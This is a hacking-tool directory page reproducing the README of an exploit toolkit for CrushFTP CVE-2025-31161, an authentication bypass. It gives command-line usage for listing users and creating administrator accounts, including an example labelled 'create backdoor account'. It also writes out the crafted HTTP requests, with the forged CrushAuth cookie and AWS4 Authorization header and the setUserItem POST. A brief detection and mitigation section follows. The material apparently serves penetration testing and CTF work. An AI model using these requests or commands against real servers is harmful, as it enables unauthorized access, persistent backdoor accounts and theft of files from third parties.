Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CrushFTP-auth-bypass-CVE-2025-31161 — Exploit for CrushFTP CVE-2025-31161 auth bypass: detects vulnerable targets, enumerates users, and creates unauthorized admin accounts through crafted HTTP requests in Go and Bash. | Kitploit
Tools/GitHubGitHub/0xdtc/crushftp-auth-bypass-cve-2025-31161
Authentication & AuthorizationPayload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCTFPenetration TestingCommand and ControlLearning & Education

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
Red Teaming
GitHub0xdtc/crushftp-auth-bypass-cve-2025-31161

CrushFTP-auth-bypass-CVE-2025-31161

Exploit for CrushFTP CVE-2025-31161 auth bypass: detects vulnerable targets, enumerates users, and creates unauthorized admin accounts through crafted HTTP requests in Go and Bash.

View Repository
90 years agoNot yet reviewed

CrushFTP Authentication Bypass - CVE-2025-31161

License: MIT CVE Go Bash

A comprehensive toolkit for exploiting CVE-2025-31161, an authentication bypass vulnerability in CrushFTP that allows unauthorized user account creation.

🔍 What is CVE-2025-31161?

CVE-2025-31161 is a critical authentication bypass vulnerability in CrushFTP that allows attackers to create unauthorized user accounts without proper authentication. This vulnerability exists in the web interface's user management functionality.

Technical Details

  • CVSS Score: TBD
  • Affected Software: CrushFTP Web Interface
  • Attack Vector: Network
  • Authentication Required: None
  • Impact: Complete system compromise through unauthorized account creation

🚀 Features

  • Multi-Language Support: Go and Bash implementations
  • Smart Vulnerability Detection: Automatically checks if target is vulnerable before exploitation
  • User Enumeration: List existing users on vulnerable targets
  • User Creation: Create new administrative accounts
  • Interactive Mode: Prompts for credentials only when target is confirmed vulnerable
  • Shorthand Flags: Quick access with -t, -p, -tu flags
  • Custom Port Support: Configurable port for different deployment scenarios
  • Educational Focus: Designed for CTF challenges and security research

📁 Repository Structure

CrushFTP-auth-bypass-CVE-2025-31161/
├── README.md                 # This documentation
├── cve-2025-31161.go        # Go implementation (recommended)
├── cve-2025-31161.sh        # Bash implementation
└── LICENSE                  # MIT License

🛠️ Installation & Requirements

Prerequisites

For Go Version (Recommended)

# Install Go (if not already installed)
sudo apt install golang-go
# or
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin

For Bash Version

# Requires curl (usually pre-installed)
sudo apt install curl

Quick Setup

git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh

🎯 Usage

Go Version (Recommended)

List Users

# Basic usage with shorthand flags
go run cve-2025-31161.go -t example.com -lu

# With custom port
go run cve-2025-31161.go -t example.com -p 8080 -lu

# Long form flags
go run cve-2025-31161.go --target_host example.com --port 8080 -lu

Add New User

# Create new user (will prompt for username/password)
go run cve-2025-31161.go -t example.com -au

# With custom target user (default: crushadmin)
go run cve-2025-31161.go -t example.com -tu admin -au

# Long form flags
go run cve-2025-31161.go --target_host example.com --target_user admin -au

Bash Version

List Users

# Basic usage
./cve-2025-31161.sh -t example.com -lu

# With custom port
./cve-2025-31161.sh -t example.com -p 8080 -lu

Add New User

# Create new user
./cve-2025-31161.sh -t example.com -au

# With custom settings
./cve-2025-31161.sh -t example.com -p 8080 -tu crushadmin -au

Available Flags

FlagLong FormDescriptionDefault
-t--target_hostTarget hostname or IP (required)-
-p--portTarget port80
-tu--target_userTarget user for exploitationcrushadmin
-lu--list-usersList existing users-
-au--add-userAdd new user (interactive)-
--helpShow help message-

Usage Examples

# Example 1: Enumerate users on target
go run cve-2025-31161.go -t ftp.example.htb -lu

# Example 2: Create backdoor account
go run cve-2025-31161.go -t ftp.example.htb -au
# Then enter: username: backdoor, password: P@ssw0rd123

# Example 3: Non-standard port with user enumeration
./cve-2025-31161.sh -t 192.168.1.100 -p 9090 -lu

# View help
./cve-2025-31161.sh --help

🔄 How It Works

flowchart TD
    A[Start Exploit] --> B[Check Target Connectivity]
    B --> C{Target Reachable?}
    C -->|No| D[Exit: Connection Failed]
    C -->|Yes| E[Send getUserList Request]
    E --> F{Response Contains OK?}
    F -->|No| G[Exit: Not Vulnerable]
    F -->|Yes| H[Target is Vulnerable!]
    H --> I{Mode Selected?}
    I -->|List Users -lu| J[Parse XML Response]
    J --> K[Display User List]
    K --> L[Exit: Success]
    I -->|Add User -au| M[Prompt for Username]
    M --> N[Prompt for Password]
    N --> O[Send Warm-up Request]
    O --> P[Craft User Creation Payload]
    P --> Q[Send setUserItem Request]
    Q --> R{User Created Successfully?}
    R -->|Yes| S[Success: Account Created]
    R -->|No| T[Failed: Exploitation Failed]

    style A fill:#e1f5fe
    style H fill:#c8e6c9
    style K fill:#81c784
    style S fill:#4caf50
    style D fill:#ffcdd2
    style G fill:#ffcdd2
    style T fill:#ffcdd2

🧪 Exploit Flow Explained

Step 1: Vulnerability Detection

The script first sends a getUserList request to check if the target is vulnerable:

GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

If the response contains <response_status>OK</response_status>, the target is vulnerable.

Step 2a: User Enumeration (List Users Mode)

When using the -lu flag, the script parses the XML response and extracts usernames:

<user_list type="vector">
    <user_list_subitem>ben</user_list_subitem>
    <user_list_subitem>crushadmin</user_list_subitem>
    <user_list_subitem>default</user_list_subitem>
</user_list>

Output:

[+] Users:
  - ben
  - crushadmin
  - default

Step 2b: User Account Creation (Add User Mode)

When using the -au flag, the script sends a setUserItem request with malicious XML payload:

POST /webinterface/function/
Content-Type: application/x-www-form-urlencoded

command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If

Step 3: Verification

The script checks for <response_status>OK</response_status> in the response to confirm successful user creation.


⚠️ Vulnerability Details

Root Cause

The vulnerability stems from insufficient authentication checks in the CrushFTP web interface's user management functionality. The application accepts user creation requests without properly validating the caller's permissions.

Impact Assessment

  • Confidentiality: HIGH - Unauthorized access to file system
  • Integrity: HIGH - Ability to modify/upload files
  • Availability: MEDIUM - Potential for resource exhaustion

Attack Scenarios

  1. Initial Access: Create backdoor accounts for persistent access
  2. Privilege Escalation: Create admin-level accounts
  3. Data Exfiltration: Access sensitive files through FTP interface
  4. Lateral Movement: Use compromised FTP server as pivot point

🛡️ Detection & Mitigation

Detection Methods

  • Monitor for unusual setUserItem requests in web logs
  • Check for new user accounts created outside normal processes
  • Implement anomaly detection for authentication bypass patterns

Mitigation Strategies

  1. Immediate: Block access to /webinterface/function/ endpoints
  2. Short-term: Update to patched CrushFTP version
  3. Long-term: Implement proper authentication controls
Download Tool